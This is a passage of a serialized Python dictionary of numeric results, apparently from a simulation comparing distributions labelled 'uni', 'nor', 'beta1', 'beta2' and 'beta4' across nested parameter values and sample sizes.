{'uni': 0.1395767904072489, 'nor': 0.15649703354689593, 'beta1': 0.1351482372851951, 'beta2': 0.18210013561700988, 'beta4': 0.12703437853096244}, 150: {'uni': 0.15452108891403543, 'nor': 0.17408683153597787, 'beta1': 0.15978450832788405, 'beta2': 0.2010339358813732, 'beta4': 0.1490451838403622}, 100: {'uni': 0.19691519706645344, 'nor': 0.20754956592257726, 'beta1': 0.19346981123970686, 'beta2': 0.2262546151997452, 'beta4': 0.18064848788367147}, 75: {'uni': 0.22469725100342314, 'nor': 0.2339068463269146, 'beta1': 0.218862094384225, 'beta2': 0.2504781042902142, 'beta4': 0.20969832951840517}, 50: {'uni': 0.2709684908276241, 'nor': 0.28043279667873244, 'beta1': 0.2702125438110171, 'beta2': 0.2976958783167438, 
'beta4': 0.2606895236787564}, 30: {'uni': 0.34168179557445916, 'nor': 0.3593449909357798, 'beta1': 0.35415662361849687, 'beta2': 0.36288665404801707, 'beta4': 0.34182381626396197}, 20: {'uni': 0.4206707653595654, 'nor': 0.43121866894350125, 'beta1': 0.42741727811475116, 'beta2': 0.4389309415030842, 'beta4': 0.4300646949028815}, 10: {'uni': 0.5741086400057797, 'nor': 0.5830036630879967, 'beta1': 0.5709629834592885, 'beta2': 0.5875161854960175, 'beta4': 0.5881252365619546}}, 300: {1000: {'uni': 0.062161639188960005, 'nor': 0.10294382539615143, 'beta1': 0.0611596822319877, 'beta2': 0.14157458374551313, 'beta4': 0.049547505930433555}, 750: {'uni': 0.0709251826905879, 'nor': 0.11006834833669127, 'beta1': 0.07067419085948462, 'beta2': 0.14514453194775367, 'beta4': 0.058480081465393324}, 500: {'uni': 0.08637817894053323, 'nor': 0.12102770685673514, 'beta1': 0.08706590398005343, 'beta2': 0.15434162169167048, 'beta4': 0.07347251631345947}, 400: {'uni': 0.09753878203585215, 'nor': 0.12985513065211424, 'beta1': 0.0972356544421249, 'beta2': 0.1640862893662115, 'beta4': 0.08247651502832595}, 300: {'uni': 0.11086452484782922, 'nor': 0.13822319327826305, 'beta1': 0.11173259516719364, 'beta2': 0.1769745582721851, 'beta4': 0.09992542940472177}, 200: {'uni': 0.1399113243441577, 'nor': 0.15754885236536986, 'beta1': 0.136504750476084, 'beta2': 0.1941827278811873, 'beta4': 0.12077586465850387}, 150: {'uni': 0.1590697336850151, 'nor': 0.17753710966522074, 'beta1': 0.1580347543820162, 'beta2': 0.20987840790701257, 'beta4': 0.14471527608486495}, 100: {'uni': 0.1871751727081637, 'nor': 0.21427301060804643, 'beta1': 0.1929312353732119, 'beta2': 0.23670383329819866, 'beta4': 0.18070834369207195}, 75: {'uni': 0.21739174405685768, 'nor': 0.23735012999276262, 'beta1': 0.22576097503322584, 'beta2': 0.25410438149243303, 'beta4': 0.2141905644666299}, 50: {'uni': 0.2702693450523803, 'nor': 0.287556930723528, 'beta1': 0.26606292030801165, 'beta2': 0.3120374891941139, 'beta4': 0.2628605451724907}, 
30: {'uni': 0.3633925191505936, 'nor': 0.3553499682791369, 'beta1': 0.3472416410315157, 'beta2': 0.36603539622620074, 'beta4': 0.3402149887634394}, 20: {'uni': 0.43686780250760227, 'nor': 0.43357372518649273, 'beta1': 0.4365167361387447, 'beta2': 0.4400213044310824, 'beta4': 0.4227051807564033}, 10: {'uni': 0.582850916214453, 'nor': 0.5881615041484773, 'beta1': 0.5909724443518736, 'beta2': 0.5979959647698587, 'beta4': 0.5748894185128298}}, 200: {1000: {'uni': 0.06189276066343463, 'nor': 0.11833873344342205, 'beta1': 0.061831743193413335, 'beta2': 0.15906399693195816, 'beta4': 0.048460784542351754}, 750: {'uni': 0.07134707707247834, 'nor': 0.12617513205267883, 'beta1': 0.07100572922533299, 'beta2': 0.1607658467629688, 'beta4': 0.05614867367172871}, 500: {'uni': 0.08564106049840525, 'nor': 0.13304497843595064, 'beta1': 0.0874138510347292, 'beta2': 0.17131354724595504, 'beta4': 0.07175587677838369}, 400: {'uni': 0.09267272777082991, 'nor': 0.14309653474101058, 'beta1': 0.09813249384450734, 'beta2': 0.17913524248375756, 'beta4': 0.08268049428370317}, 300: {'uni': 0.10923381308894958, 'nor': 0.15222716073399284, 'beta1': 0.11266368232034613, 'beta2': 0.1854635291641431, 'beta4': 0.09615779121211337}, 200: {'uni': 0.1363804725778009, 'nor': 0.17267694139649953, 'beta1': 0.13582009258399352, 'beta2': 0.19574314248677793, 'beta4': 0.1179637069833459}, 150: {'uni': 0.15887161022374907, 'nor': 0.18432817945104918, 'beta1': 0.16199472287112165, 'beta2': 0.21773658228591058, 'beta4': 0.14255486238615406}, 100: {'uni': 0.19262944923823816, 'nor': 0.21456176331780907, 'beta1': 0.19248127836354945, 'beta2': 0.249444130339123, 'beta4': 0.17499830511234898}, 75: {'uni': 0.22633597240156172, 'nor': 0.24116115592351106, 'beta1': 0.2161337337848539, 'beta2': 0.2609793421406472, 'beta4': 0.21072808513003066}, 50: {'uni': 0.2644800919231039, 'nor': 0.297735358593486, 'beta1': 0.27231937439921694, 'beta2': 0.3102197722435756, 'beta4': 0.25709639846200694}, 30: {'uni': 
0.34625180846494763, 'nor': 0.35746737858146227, 'beta1': 0.354486005184482, 'beta2': 0.38683476647160936, 'beta4': 0.33170959441086517}, 20: {'uni': 0.4208903869972874, 'nor': 0.43552557162203065, 'beta1': 0.4221261305003158, 'beta2': 0.43662638995711245, 'beta4': 0.41463291398406665}, 10: {'uni': 0.5741138916139755, 'nor': 0.5851120398678165, 'beta1': 0.5841496889181017, 'beta2': 0.5934894074324251, 'beta4': 0.5863482781018794}}, 150: {1000: {'uni': 0.061581541028080056, 'nor': 0.13381363846898142, 'beta1': 0.06128042761918895, 'beta2': 0.1708966560232832, 'beta4': 0.04741420430861787}, 750: {'uni': 0.07217513645135509, 'nor': 0.1419413060812098, 'beta1': 0.07273928089814014, 'beta2': 0.1704412808052873, 'beta4': 0.05574805904383956}, 500: {'uni': 0.08676298708174202, 'nor': 0.14572604267188155, 'beta1': 0.08647759105067054, 'beta2': 0.18242632197904074, 'beta4': 0.068983137151813}, 400: {'uni': 0.1037742765004267, 'nor': 0.15223240381779424, 'beta1': 0.09518076159694533, 'beta2': 0.18643202068616882, 'beta4': 0.07923549680449954}, 300: {'uni': 0.11129074028405522, 'nor': 0.16268462117490684, 'beta1': 0.11075585275192301, 'beta2': 0.19821370441263542, 'beta4': 0.0912523876738719}, 200: {'uni': 0.14156920331099243, 'nor': 0.183250873096864, 'beta1': 0.13716604234880148, 'beta2': 0.2130216482290011, 'beta4': 0.11611656331446252}, 150: {'uni': 0.15991456155699446, 'nor': 0.19972632801083756, 'beta1': 0.1591623711263259, 'beta2': 0.22363803209488897, 'beta4': 0.14252665232189032}, 100: {'uni': 0.19390376852650276, 'nor': 0.2201533899028501, 'beta1': 0.18839789593786516, 'beta2': 0.24896472297863287, 'beta4': 0.1770303243572896}, 75: {'uni': 0.22864723992828329, 'nor': 0.25517195260709286, 'beta1': 0.2223328847363084, 'beta2': 0.2733216821263156, 'beta4': 0.20304334588696407}, 50: {'uni': 0.27905130659334465, 'nor': 0.29278280274240853, 'beta1': 0.27019362750168496, 'beta2': 0.31309475544534465, 'beta4': 0.2559990955320065}, 30: {'uni': 0.3425789585849717, 'nor': 
0.37265663059965937, 'beta1': 0.3464581721664352, 'beta2': 0.3754015070826656, 'beta4': 0.33959173277428956}, 20: {'uni': 0.413086515337455, 'nor': 0.43965945028509446, 'beta1': 0.418736079933717, 'beta2': 0.4501591234804877, 'beta4': 0.4084124782048353}, 10: {'uni': 0.5706418060679364, 'nor': 0.6001645167142622, 'beta1': 0.583725351797004, 'beta2': 0.6040594457979085, 'beta4': 0.5764634218983131}}, 100: {1000: {'uni': 0.06313216417743228, 'nor': 0.15511920982718863, 'beta1': 0.06071848963460641, 'beta2': 0.1852927465697436, 'beta4': 0.046839153362001285}, 750: {'uni': 0.07060453599906669, 'nor': 0.15967621914568836, 'beta1': 0.07229601201250235, 'beta2': 0.182858927441081, 'beta4': 0.055455267837987376}, 500: {'uni': 0.08818052394211406, 'nor': 0.16873532933540125, 'beta1': 0.0868958489599253, 'beta2': 0.1975968138053138, 'beta4': 0.06905730331083232}, 400: {'uni': 0.09814516465678552, 'nor': 0.1712550619838623, 'beta1': 0.09386098643015672, 'beta2': 0.20350183151319534, 'beta4': 0.0760007184942118}, 300: {'uni': 0.11258064110576615, 'nor': 0.1861127284054659, 'beta1': 0.11092868379936521, 'beta2': 0.20785761241672152, 'beta4': 0.09103330358097073}, 200: {'uni': 0.1420062149021436, 'nor': 0.2039189542914086, 'beta1': 0.13490696398941743, 'beta2': 0.21950847474619883, 'beta4': 0.11479778662604484}, 150: {'uni': 0.15523966003490114, 'nor': 0.21793931900467456, 'beta1': 0.15561530770905507, 'beta2': 0.2357875854144415, 'beta4': 0.13546635253677153}, 100: {'uni': 0.19239990647813998, 'nor': 0.2438993981647118, 'beta1': 0.1922366330056719, 'beta2': 0.2604761303669994, 'beta4': 0.1659451762115397}, 75: {'uni': 0.22461916118542863, 'nor': 0.27058774539802555, 'beta1': 0.22230160922578357, 'beta2': 0.2911017312827485, 'beta4': 0.19346309234954379}, 50: {'uni': 0.27074554119725264, 'nor': 0.30742771165485183, 'beta1': 0.27244230243937856, 'beta2': 0.32070239362920566, 'beta4': 0.24948280857988892}, 30: {'uni': 0.35244357964247014, 'nor': 0.36981016362792096, 'beta1': 
0.34898633566867193, 'beta2': 0.38698154490065484, 'beta4': 0.3248812590836839}, 20: {'uni': 0.4240679624088838, 'nor': 0.45938820409137887, 'beta1': 0.43245353617429105, 'beta2': 0.44501946591388836, 'beta4': 0.40725305375468834}, 10: {'uni': 0.5815683982350479, 'nor': 0.5902866349338, 'beta1': 0.5747202522025672, 'beta2': 0.6059676751094598, 'beta4': 0.5690438100022845}}, 75: {1000: {'uni': 0.06343097776077222, 'nor': 0.18225818491306756, 'beta1': 0.06089929840604752, 'beta2': 0.1921539386252139, 'beta4': 0.04668630013644415}, 750: {'uni': 0.07093914009247082, 'nor': 0.18331684154766742, 'beta1': 0.07107432732560648, 'beta2': 0.19880651185771303, 'beta4': 0.05348844967825772}, 500: {'uni': 0.08795472881903066, 'nor': 0.18823200655948724, 'beta1': 0.08586213142784449, 'beta2': 0.20523208991902597, 'beta4': 0.0679290798965112}, 400: {'uni': 0.09712081890314317, 'nor': 0.19232649259506907, 'beta1': 0.09572130547403512, 'beta2': 0.20602199644821684, 'beta4': 0.07606892412187635}, 300: {'uni': 0.11089260364623976, 'nor': 0.20098062324678168, 'beta1': 0.11308804326671185, 'beta2': 0.21785952031115308, 'beta4': 0.08679599809855915}, 200: {'uni': 0.13809595295884958, 'nor': 0.21558504424344116, 'beta1': 0.13648211163259177, 'beta2': 0.2240794200909899, 'beta4': 0.11204654007283227}, 150: {'uni': 0.15618647125937568, 'nor': 0.22837035534828887, 'beta1': 0.16415374893470858, 'beta2': 0.24619708299092824, 'beta4': 0.1306985642616213}, 100: {'uni': 0.19101450956719734, 'nor': 0.25931455723118757, 'beta1': 0.1906189266503715, 'beta2': 0.25867729487710983, 'beta4': 0.16519992510196357}, 75: {'uni': 0.2248743837036717, 'nor': 0.284057154634835, 'beta1': 0.2214601276761196, 'beta2': 0.2968579661443965, 'beta4': 0.19826666120956982}, 50: {'uni': 0.2662431911648192, 'nor': 0.322043709935765, 'beta1': 0.2744451907446851, 'beta2': 0.32350434821909946, 'beta4': 0.23404149031621968}, 30: {'uni': 0.3413757219051654, 'nor': 0.38244337953851876, 'beta1': 0.33835049788177923, 'beta2': 
0.38719686508504525, 'beta4': 0.32727681475974785}, 20: {'uni': 0.4194033788361589, 'nor': 0.4577741598526479, 'beta1': 0.42074777341644765, 'beta2': 0.459091804977372, 'beta4': 0.396462204973229}, 10: {'uni': 0.5907006598340476, 'nor': 0.6052762697560137, 'beta1': 0.5799457230505303, 'beta2': 0.5967731695513359, 'beta4': 0.5567664226243562}}, 50: {1000: {'uni': 0.06289662081877767, 'nor': 0.21209732127933695, 'beta1': 0.06328219460040524, 'beta2': 0.21952990496616331, 'beta4': 0.04652359653778593}, 750: {'uni': 0.07302743229171516, 'nor': 0.214754896945754, 'beta1': 0.07193093639114312, 'beta2': 0.22024404018125943, 'beta4': 0.05415327509547532}, 500: {'uni': 0.08893676490117702, 'nor': 0.22572655912609974, 'beta1': 0.08580989277541334, 'beta2': 0.22230227225554544, 'beta4': 0.06673468929448162}, 400: {'uni': 0.09924243273175976, 'nor': 0.21704650146565524, 'beta1': 0.09913193004467818, 'beta2': 0.2230390821061281, 'beta4': 0.07605580382200511}, 300: {'uni': 0.11166832041438324, 'nor': 0.2316018695710197, 'beta1': 0.11095163241473041, 'beta2': 0.22865927465012947, 'beta4': 0.08685797923558519}, 200: {'uni': 0.13771685172695608, 'nor': 0.2444927799351998, 'beta1': 0.13618389281423876, 'beta2': 0.2476456752305473, 'beta4': 0.11083026707940419}, 150: {'uni': 0.16377774164329523, 'nor': 0.26636154033277937, 'beta1': 0.15952097465539494, 'beta2': 0.2642089480719845, 'beta4': 0.12746484906871963}, 100: {'uni': 0.19907093430084438, 'nor': 0.2881344316533607, 'beta1': 0.19083482136604094, 'beta2': 0.2795457182953769, 'beta4': 0.16290169574365254}, 75: {'uni': 0.22574036421615706, 'nor': 0.2945057282847927, 'beta1': 0.22099290833697738, 'beta2': 0.3125623487295235, 'beta4': 0.18773801878190854}, 50: {'uni': 0.26854352815958205, 'nor': 0.34022111278024636, 'beta1': 0.26708927188428466, 'beta2': 0.33081642137592326, 'beta4': 0.2312879966418534}, 30: {'uni': 0.34609583514062453, 'nor': 0.3974340756558435, 'beta1': 0.35262530240286505, 'beta2': 0.40184913128104555, 'beta4': 
0.31424089478942174}, 20: {'uni': 0.42087262066086245, 'nor': 0.4723782826353492, 'beta1': 0.40877860835331126, 'beta2': 0.4688509117448108, 'beta4': 0.3944964916008954}, 10: {'uni': 0.5876869576804664, 'nor': 0.6147903811081372, 'beta1': 0.5755066117906042, 'beta2': 0.6002859122286868, 'beta4': 0.5619966062890571}}, 30: {1000: {'uni': 0.06948652094585245, 'nor': 0.2718705530055696, 'beta1': 0.06121483805914607, 'beta2': 0.24043460865095967, 'beta4': 0.04627664402531112}, 750: {'uni': 0.07850498128590577, 'nor': 0.2757982454491844, 'beta1': 0.07241579137645177, 'beta2': 0.23983322004672003, 'beta4': 0.05332068388106076}, 500: {'uni': 0.09105158068430297, 'nor': 0.28241113398116124, 'beta1': 0.08799353765963347, 'beta2': 0.24766224893806577, 'beta4': 0.06765893263671346}, 400: {'uni': 0.10259273534636915, 'nor': 0.2792924843341777, 'beta1': 0.09836004244107166, 'beta2': 0.2550995041680404, 'beta4': 0.07407712496960317}, 300: {'uni': 0.11391452466229124, 'nor': 0.2807189754417535, 'beta1': 0.10984101411545055, 'beta2': 0.26044799268369856, 'beta4': 0.08443610887402886}, 200: {'uni': 0.14196809341696937, 'nor': 0.30755809164972786, 'beta1': 0.134610786707702, 'beta2': 0.2728609545630691, 'beta4': 0.10722586308476961}, 150: {'uni': 0.16419172956318423, 'nor': 0.3146162122023685, 'beta1': 0.16286335903122795, 'beta2': 0.2776012731538803, 'beta4': 0.12523292823182686}, 100: {'uni': 0.1960001100263563, 'nor': 0.33279373396299217, 'beta1': 0.19130478182156138, 'beta2': 0.3054148396914321, 'beta4': 0.14912466816038042}, 75: {'uni': 0.2185677970786405, 'nor': 0.34709466522087906, 'beta1': 0.22127741653506036, 'beta2': 0.3201758535953785, 'beta4': 0.1777525903209297}, 50: {'uni': 0.270413471015134, 'nor': 0.3892831769925561, 'beta1': 0.2761867140439328, 'beta2': 0.35340657017600746, 'beta4': 0.22674679543504245}, 30: {'uni': 0.3355166504892189, 'nor': 0.44161834679911804, 'beta1': 0.3401068225433252, 'beta2': 0.4102852253271071, 'beta4': 0.3009578630318522}, 20: {'uni': 
0.4262038800117972, 'nor': 0.5086511058873824, 'beta1': 0.41934711626787075, 'beta2': 0.4781819621838607, 'beta4': 0.3804323693448428}, 10: {'uni': 0.5575440699348245, 'nor': 0.6393871170053329, 'beta1': 0.5743956360209639, 'beta2': 0.6106643197230515, 'beta4': 0.55155845441342}}, 20: {1000: {'uni': 0.07536262505840652, 'nor': 0.325103001431867, 'beta1': 0.06343013362012273, 'beta2': 0.2629182940928082, 'beta4': 0.0460977432301721}, 750: {'uni': 0.0829470027542002, 'nor': 0.32291554964370983, 'beta1': 0.07116730251499337, 'beta2': 0.2659412807353341, 'beta4': 0.05406687577763064}, 500: {'uni': 0.09694368519188473, 'nor': 0.3349376153106337, 'beta1': 0.08654293972580873, 'beta2': 0.2723939674154165, 'beta4': 0.06538298069380022}, 400: {'uni': 0.10627426651824678, 'nor': 0.3429154491873649, 'beta1': 0.09562315388400733, 'beta2': 0.274633662575442, 'beta4': 0.07380231095120421}, 300: {'uni': 0.12121567109701081, 'nor': 0.34972582827606147, 'beta1': 0.1103611782866849, 'beta2': 0.2862428547095127, 'beta4': 0.08272204817151216}, 200: {'uni': 0.14071639130023078, 'nor': 0.35855620239382735, 'beta1': 0.13776555190056528, 'beta2': 0.29720835544613766, 'beta4': 0.10338502388302273}, 150: {'uni': 0.1674293069624112, 'nor': 0.3688691322877407, 'beta1': 0.1527138911941961, 'beta2': 0.3059024770592428, 'beta4': 0.11972445069338061}, 100: {'uni': 0.1931249598575589, 'nor': 0.3948780972148766, 'beta1': 0.19347436784743782, 'beta2': 0.3310703246707575, 'beta4': 0.15095159670353941}, 75: {'uni': 0.22271809589488334, 'nor': 0.3953558256807349, 'beta1': 0.22024905763478564, 'beta2': 0.34639607563218006, 'beta4': 0.1733242565090895}, 50: {'uni': 0.2692139861904778, 'nor': 0.44176675584445435, 'beta1': 0.2681610154192196, 'beta2': 0.3688995176021794, 'beta4': 0.2199893429283878}, 30: {'uni': 0.34613135894553704, 'nor': 0.48601158747952417, 'beta1': 0.3526353889844575, 'beta2': 0.41994055226884575, 'beta4': 0.3022745779371493}, 20: {'uni': 0.4142621100975231, 'nor': 0.5324753066803931, 
'beta1': 0.42017567922341303, 'beta2': 0.4983438571041758, 'beta4': 0.37087287301736277}, 10: {'uni': 0.5815509625778061, 'nor': 0.6599263857098001, 'beta1': 0.5848662195260658, 'beta2': 0.6277074211809401, 'beta4': 0.536410316354095}}, 10: {1000: {'uni': 0.10593932477847545, 'nor': 0.47843393031925197, 'beta1': 0.09118434879484168, 'beta2': 0.31039960784712656, 'beta4': 0.04571662748262856}, 750: {'uni': 0.10873654868800559, 'nor': 0.4828796783832185, 'beta1': 0.09123008540154381, 'beta2': 0.32058869843201154, 'beta4': 0.05459270006386302}, 500: {'uni': 0.1218524317529881, 'nor': 0.47457693822012165, 'beta1': 0.09190111833494254, 'beta2': 0.32548160013208494, 'beta4': 0.06444599187085187}, 400: {'uni': 0.1291175399330874, 'nor': 0.48422996573767696, 'beta1': 0.09770420769932464, 'beta2': 0.3207957215249058, 'beta4': 0.07182128251456826}, 300: {'uni': 0.13986394783048994, 'nor': 0.4936681503491342, 'beta1': 0.11639095276280087, 'beta2': 0.3302723438968203, 'beta4': 0.08350546988796351}, 200: {'uni': 0.15641204249228619, 'nor': 0.49091789466629215, 'beta1': 0.1384070227155504, 'beta2': 0.33428367370964873, 'beta4': 0.10341259876194087}, 150: {'uni': 0.1795234939504045, 'nor': 0.5105288108171256, 'beta1': 0.15598497704645214, 'beta2': 0.3493488175884878, 'beta4': 0.121233871216612}, 100: {'uni': 0.20239443979403965, 'nor': 0.5084179657882892, 'beta1': 0.19184385711254798, 'beta2': 0.3677119127424313, 'beta4': 0.14277278677201605}, 75: {'uni': 0.23336879708678648, 'nor': 0.5372531064368602, 'beta1': 0.21661827263964478, 'beta2': 0.38626444266491533, 'beta4': 0.1731449508683547}, 50: {'uni': 0.27958310612315557, 'nor': 0.5493723312942567, 'beta1': 0.27176323053080753, 'beta2': 0.4024758607629697, 'beta4': 0.21208860379265493}, 30: {'uni': 0.35159835409526013, 'nor': 0.6014446437219039, 'beta1': 0.3425500943598077, 'beta2': 0.4384712270988477, 'beta4': 0.27735321868152857}, 20: {'uni': 0.42536479079788436, 'nor': 0.638297428768129, 'beta1': 0.41601242728257026, 'beta2': 
0.4962070327728678, 'beta4': 0.35012615099378874}, 10: {'uni': 0.5790001552629874, 'nor': 0.7766658813569549, 'beta1': 0.5698438923280504, 'beta2': 0.6494949780401632, 'beta4': 0.5099159037878125}}}, 0.005: {1000: {1000: {'uni': 0.054309210293536636, 'nor': 0.06770710838466354, 'beta1': 0.05394964156179005, 'beta2': 0.10851637362805477, 'beta4': 0.04843440132315624}, 750: {'uni': 0.06322911372839468, 'nor': 0.0745551173670449, 'beta1': 0.06287867060893981, 'beta2': 0.11461799139150997, 'beta4': 0.05586943360634522}, 500: {'uni': 0.07765031214887835, 'nor': 0.08611027590190884, 'beta1': 0.07713692782616743, 'beta2': 0.11964611258405178, 'beta4': 0.07119677640670702}, 400: {'uni': 0.0854335124620158, 'nor': 0.09548666720165888, 'beta1': 0.08533596488740514, 'beta2': 0.12715285235100549, 'beta4': 0.07976243865103633}, 300: {'uni': 0.09989789753529099, 'nor': 0.10770019723728286, 'beta1': 0.10033186368236657, 'beta2': 0.13419229911795216, 'beta4': 0.09411115678315363}, 200: {'uni': 0.12127892617742153, 'nor': 0.12720442210497968, 'beta1': 0.12233003012147065, 'beta2': 0.15172099760163998, 'beta4': 0.11632447574237281}, 150: {'uni': 0.14013211406544834, 'nor': 0.14827174402121335, 'beta1': 0.13915131007977077, 'beta2': 0.1658270971393584, 'beta4': 0.13647642747887956}, 100: {'uni': 0.16997690980859004, 'nor': 0.17670091885771855, 'beta1': 0.16973161594489053, 'beta2': 0.19345282120387458, 'beta4': 0.1661007523523409}, 75: {'uni': 0.19932581091265966, 'nor': 0.2027740177880774, 'beta1': 0.19612208261591985, 'beta2': 0.21702643923996, 'beta4': 0.19530006216709206}, 50: {'uni': 0.2468910799274996, 'nor': 0.24339758057452598, 'beta1': 0.24033137076480987, 'beta2': 0.252320775622887, 'beta4': 0.2366355896057103}, 30: {'uni': 0.305496981057798, 'nor': 0.3093061642043575, 'beta1': 0.3019112459095068, 'beta2': 0.32031294166562413, 'beta4': 0.3061483505104996}, 20: {'uni': 0.3717287585662501, 'nor': 0.37675350444050804, 'beta1': 0.37247628349892237, 'beta2': 0.37673982805892064, 
'beta4': 0.3751343167170222}, 10: {'uni': 0.521167289093317, 'nor': 0.518263035063083, 'beta1': 0.5175638164552467, 'beta2': 0.5206573949182801, 'beta4': 0.5201760853486797}}, 750: {1000: {'uni': 0.055164667777315046, 'nor': 0.07131664732480447, 'beta1': 0.05461015638241973, 'beta2': 0.10747658269785487, 'beta4': 0.04694525214323675}, 750: {'uni': 0.06303342152086694, 'nor': 0.07763029700247803, 'beta1': 0.06322330711203825, 'beta2': 0.11262414947388338, 'beta4': 0.05532984777518732}, 500: {'uni': 0.07669845695030969, 'nor': 0.09063047612797143, 'beta1': 0.07696921230024523, 'beta2': 0.11983272103386594, 'beta4': 0.06956147386680006}, 400: {'uni': 0.08611488267094475, 'nor': 0.0974713367565152, 'beta1': 0.08478041441928014, 'beta2': 0.12731656056450652, 'beta4': 0.07991489810774749}, 300: {'uni': 0.09985154726648465, 'nor': 0.111169848481041, 'beta1': 0.09777711208026346, 'beta2': 0.13531396869038226, 'beta4': 0.09119975402687397}, 200: {'uni': 0.1211085307144601, 'nor': 0.12968999402436032, 'beta1': 0.12091197897231892, 'beta2': 0.15150314994539527, 'beta4': 0.1155329295397578}, 150: {'uni': 0.14070726556031377, 'nor': 0.14567076992622047, 'beta1': 0.13814881873714974, 'beta2': 0.16827021141072973, 'beta4': 0.13447433397080932}, 100: {'uni': 0.17147077335738992, 'nor': 0.17723697577268377, 'beta1': 0.1701072384695923, 'beta2': 0.19228744913609386, 'beta4': 0.16650131522038414}, 75: {'uni': 0.19697585503036097, 'nor': 0.2068795811630726, 'beta1': 0.19570918631380896, 'beta2': 0.21738847323087096, 'beta4': 0.19446732054460464}, 50: {'uni': 0.23830528070048534, 'nor': 0.24112746544721542, 'beta1': 0.24024370353633562, 'beta2': 0.25617890898562745, 'beta4': 0.2374860040189496}, 30: {'uni': 0.3047940690571652, 'nor': 0.3117736625777223, 'beta1': 0.3075351731550439, 'beta2': 0.3272819694873685, 'beta4': 0.3075370456855608}, 20: {'uni': 0.38162187029118155, 'nor': 0.3738685108858104, 'beta1': 0.372463189312913, 'beta2': 0.3868272294258014, 'beta4': 0.37379486160733993}, 
10: {'uni': 0.5258444160016277, 'nor': 0.5215991214259363, 'beta1': 0.517833660238219, 'beta2': 0.5255924381659314, 'beta4': 0.514420238437874}}, 500: {1000: {'uni': 0.05462849470497394, 'nor': 0.07814858053006213, 'beta1': 0.05439078035500816, 'beta2': 0.11786529274785795, 'beta4': 0.04512974256857838}, 750: {'uni': 0.0630164202653, 'nor': 0.08598140708093582, 'beta1': 0.06280717820250309, 'beta2': 0.12253896527927555, 'beta4': 0.05327711159917553}, 500: {'uni': 0.07718768079866062, 'nor': 0.09473087596860513, 'beta1': 0.07771672820740799, 'beta2': 0.13066189974731812, 'beta4': 0.06792781655042113}, 400: {'uni': 0.08727900239437064, 'nor': 0.1031046602693152, 'beta1': 0.08587201246728926, 'beta2': 0.13750278345580969, 'beta4': 0.07641943558033681}, 300: {'uni': 0.09735499483435273, 'nor': 0.11238965365776238, 'beta1': 0.10105981918034712, 'beta2': 0.1429736395904797, 'beta4': 0.09020195977248413}, 200: {'uni': 0.12317763693332873, 'nor': 0.13530119957403747, 'beta1': 0.11942019256586084, 'beta2': 0.16298780836084303, 'beta4': 0.11456409066249257}, 150: {'uni': 0.1407614431099966, 'nor': 0.15131961478693112, 'beta1': 0.14148625143732174, 'beta2': 0.17679433711198078, 'beta4': 0.13076961122199615}, 100: {'uni': 0.1713862765989115, 'nor': 0.18173933803266007, 'beta1': 0.17107023194956172, 'beta2': 0.20004435790715813, 'beta4': 0.16667447549743752}, 75: {'uni': 0.19683034656665033, 'nor': 0.20562378844499862, 'beta1': 0.20171095440300613, 'beta2': 0.2228278954167986, 'beta4': 0.18979851902028033}, 50: {'uni': 0.24134168665013422, 'nor': 0.25303094047370045, 'beta1': 0.2405937821161408, 'beta2': 0.25814476480505677, 'beta4': 0.23379201812238004}, 30: {'uni': 0.30572219759341496, 'nor': 0.3138147539731113, 'beta1': 0.31220387612792333, 'beta2': 0.32746285385932816, 'beta4': 0.3068274256947208}, 20: {'uni': 0.3766240108372487, 'nor': 0.3794127882935937, 'beta1': 0.3687031808183018, 'beta2': 0.3835817175154338, 'beta4': 0.36538004912059097}, 10: {'uni': 
0.5172842691254594, 'nor': 0.5231665455873322, 'beta1': 0.5189693525633482, 'beta2': 0.5311363287437341, 'beta4': 0.5139644087094528}}, 400: {1000: {'uni': 0.05437173202096113, 'nor': 0.08305972110203474, 'beta1': 0.054735721524527214, 'beta2': 0.11691664940089053, 'beta4': 0.044764759336513305}, 750: {'uni': 0.06296519099843445, 'nor': 0.08805615903403163, 'beta1': 0.06272026286720017, 'beta2': 0.1210806824585442, 'beta4': 0.052896515060130544}, 500: {'uni': 0.07760492127335133, 'nor': 0.0995661105004016, 'beta1': 0.07684496802411883, 'beta2': 0.12802441585532842, 'beta4': 0.06722957912133365}, 400: {'uni': 0.08525797685642766, 'nor': 0.1059372885433747, 'beta1': 0.08619988724777161, 'beta2': 0.13431886591110576, 'beta4': 0.07539217174214996}, 300: {'uni': 0.0982990668151138, 'nor': 0.11634268888448995, 'beta1': 0.09983116086197136, 'beta2': 0.14490484107113055, 'beta4': 0.08792653305842368}, 200: {'uni': 0.12203769639477358, 'nor': 0.13660314035918714, 'beta1': 0.12012838172596668, 'beta2': 0.15855457816365026, 'beta4': 0.11342497995414347}, 150: {'uni': 0.13994483228161086, 'nor': 0.15423137169373957, 'beta1': 0.14071121957348942, 'beta2': 0.1759524837742879, 'beta4': 0.12973842437014774}, 100: {'uni': 0.16998004751235896, 'nor': 0.18533997087586795, 'beta1': 0.17260069554339919, 'beta2': 0.20142524926231042, 'beta4': 0.16375622461186412}, 75: {'uni': 0.19919438048820443, 'nor': 0.20872180909907717, 'beta1': 0.19747443091888628, 'beta2': 0.22331606995046627, 'beta4': 0.18915187538619394}, 50: {'uni': 0.24260494503890717, 'nor': 0.2490837050424674, 'beta1': 0.24174431425141207, 'beta2': 0.26695113075708743, 'beta4': 0.23530080467269482}, 30: {'uni': 0.30678574020464666, 'nor': 0.3207642333511338, 'beta1': 0.30811715717135785, 'beta2': 0.3248044091864074, 'beta4': 0.3019272505018041}, 20: {'uni': 0.3754849973727803, 'nor': 0.3792312499409558, 'beta1': 0.3737894450702678, 'beta2': 0.39127103265108387, 'beta4': 0.3711738822600462}, 10: {'uni': 0.5138997823796634, 
'nor': 0.5127905077842452, 'beta1': 0.5169043634953481, 'beta2': 0.5281055333295728, 'beta4': 0.5193863606893283}}, 300: {1000: {'uni': 0.054171219309968266, 'nor': 0.09149857715201964, 'beta1': 0.054967619265905765, 'beta2': 0.12328907814221546, 'beta4': 0.04422880083376829}, 750: {'uni': 0.06228069924407087, 'nor': 0.09672249810959854, 'beta1': 0.0633028218826393, 'beta2': 0.12865131475687186, 'beta4': 0.05215982023008059}, 500: {'uni': 0.07862740955308545, 'nor': 0.10538600209851101, 'beta1': 0.07634673776224471, 'beta2': 0.13579516304274086, 'beta4': 0.06570451083138404}, 400: {'uni': 0.08606522700190578, 'nor': 0.11159352035626091, 'beta1': 0.08637179271313189, 'beta2': 0.1427193158728336, 'beta4': 0.07325637093886234}, 300: {'uni': 0.09982270055761183, 'nor': 0.122758213601175, 'beta1': 0.09973780782522945, 'beta2': 0.15198003666478777, 'beta4': 0.08630423340788074}, 200: {'uni': 0.12190239561659899, 'nor': 